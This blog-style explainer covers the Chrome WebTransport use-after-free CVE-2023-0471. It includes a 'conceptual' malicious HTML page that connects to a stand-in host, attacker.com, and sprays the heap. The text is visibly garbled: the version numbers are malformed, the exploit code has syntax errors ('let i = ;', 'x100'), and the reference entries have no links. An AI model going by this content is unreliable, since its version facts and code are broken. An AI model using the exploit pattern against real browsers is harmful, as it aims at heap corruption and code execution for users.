CVE-2023-0471 is a high-severity browser vulnerability reported in early 2023, affecting Google Chrome versions prior to 109..5414.119. The bug is a Use After Free (UAF) in the WebTransport component, and successful exploitation can potentially allow a remote attacker to corrupt the heap or even execute arbitrary code by getting a user to visit a specially crafted HTML page.
In this long-read, we’ll break down what this bug is, how it could be exploited, show code snippets for a conceptual attack, and share resources for further reading.
What is WebTransport?
WebTransport is a web API for low-latency, bidirectional, client-server communications using HTTP/3. It’s relatively new and meant to supersede WebSockets for certain scenarios.
What is a Use After Free?
A Use After Free bug occurs when an application continues using a pointer (reference to memory) after the memory it points to has already been released (“freed”). This often leads to heap corruption and sometimes remote code execution.
CVE-2023-0471: The Vulnerability Explained
Google’s bulletin describes it:
> “Use after free in WebTransport in Google Chrome prior to 109..5414.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.”
In simpler terms: if a webpage uses WebTransport in a specific way, an attacker can create a situation where a JavaScript object is freed, but code continues to use the old reference. If they can control what fills that freed memory (“heap spray”), they might be able to take over the process.
Malicious code might look like this
<!DOCTYPE html>
<html>
<body>
<script>
async function uaf_trigger() {
// Step 1: Open WebTransport Session
let wt = new WebTransport('https://attacker.com:4433/';);
await wt.ready;
// Step 2: Register a handler that will be invoked after object is freed
let stream = await wt.createOutgoingUnidirectionalStream();
stream.closed.then(() => {
// Attacker's controlled callback
fake_object();
});
// Step 3: "Abandon" WebTransport (potentially triggers UAF in old versions)
wt = null;
// Garbage collection may free the object.
// Step 4: Heap spray
for (let i = ; i < 10000; i++) {
let arr = new ArrayBuffer(x100); // Fills freed memory with attacker data
// Store somewhere to avoid GC
window['spray'+i] = arr;
}
}
function fake_object() {
// Placeholder: In a real exploit, this could be code that runs as a result of UAF.
alert("If Chrome was vulnerable, this code could run with attacker privileges.");
}
uaf_trigger();
</script>
</body>
</html>
Note: This is conceptual. Real-world exploits would need to bypass mitigation features (like sandboxing or Control-Flow Integrity) and might use more sophisticated heap spraying techniques.
Are You Vulnerable?
Any user running Chrome versions before 109..5414.119 is potentially at risk. This includes Chromium forks (Edge, Brave, etc). Update immediately.
How Was It Fixed?
Chrome’s fix involved patching the WebTransport implementation to ensure that no references to objects are used post-free. You can see the commit here (if available).
Chrome Release Notes:
Stable Channel Update for Desktop (February 2023)
Chromium Issue Tracker:
WebTransport Documentation:
Understanding Use After Free:
Google Project Zero: Exploiting UAF
Conclusion
CVE-2023-0471 stands as a reminder that modern browsers, despite their defenses, continue to have severe security flaws. Simple object lifecycles in web APIs, when mishandled, can lead to critical vulnerabilities. For users, the best defense is to always keep your browser updated. For security researchers, it highlights the importance of memory safety in complex systems.
Timeline
Published on: 01/30/2023 09:15:00 UTC
Last modified on: 02/06/2023 21:42:00 UTC